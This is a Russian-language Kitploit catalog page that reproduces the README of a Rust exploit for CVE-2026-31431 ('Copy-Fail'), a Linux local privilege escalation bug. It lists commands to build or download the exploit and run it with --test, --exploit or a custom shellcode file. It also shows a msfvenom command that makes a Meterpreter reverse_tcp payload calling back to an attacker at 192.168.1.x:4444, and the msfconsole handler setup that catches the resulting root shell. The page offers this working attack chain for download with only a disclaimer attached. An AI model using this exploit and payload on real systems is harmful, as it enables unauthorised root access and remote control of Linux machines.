Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-31431-Linux-Copy-Fail — Rust-эксплойт для локального повышения привилегий через CVE-2026-31431, позволяющий выполнение пользовательского шеллкода, например Meterpreter, в Linux-системах. | Kitploit
Инструменты/GitHubGitHub/iss4cf0ng/cve-2026-31431-linux-copy-fail
Повышение привилегийФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubiss4cf0ng/cve-2026-31431-linux-copy-fail

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-31431-Linux-Copy-Fail

Rust-эксплойт для локального повышения привилегий через CVE-2026-31431, позволяющий выполнение пользовательского шеллкода, например Meterpreter, в Linux-системах.

РепозиторийСайт
562144 месяцев назадПроверено Kitploit

CVE-2026-31431 - Linux Copy-Fail Exploit (Rust)

Реализация локального повышения привилегий для CVE-2026-31431 (Copy-Fail) на языке Rust.

Она позволяет выполнять пользовательский шеллкод (например, Meterpreter)

Введение

Xint раскрыл CVE-2026-31431 — уязвимость произвольной записи в page cache, которая связывает AF_ALG и splice() для достижения примитива записи в 4 байта.

Источник: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

Отказ от ответственности

Этот проект был разработан в рамках моего личного интереса к изучению кибербезопасности. Однако он потенциально может быть использован в злонамеренных целях.

Пожалуйста, НЕ используйте этот инструмент для любых незаконных действий.

Автор не несёт ответственности за любое неправомерное использование этого программного обеспечения.

Благодарности

  • theori-io/copy-fail-CVE-2026-31431

Примечание: В оригинальной работе используется сжатый/закодированный шеллкод (например, /bin/sh). В этой реализации я заменил его на сырой (несжатый) шеллкод /bin/bash, что упрощает его настройку или прямую замену на пользовательские полезные нагрузки.

Как скомпилировать

Клонируйте проект, затем выполните build.sh:

root@kitploit:~
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

Использование

Скачайте и распакуйте релизный пакет:

root@kitploit:~
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

Бинарные файлы предоставляют следующие опции:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

Демонстрация

Проверка уязвимости

На уязвимой машине:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test

Эксплуатация

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Используйте команду (установите PrependSetUid в True) ниже для генерации полезной нагрузки Meterpreter:

root@kitploit:~
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

На машине атакующего (Kali Linux):

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

На уязвимой машине:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

Затронутые версии

  • Ubuntu
  • Redhat
Скачать инструмент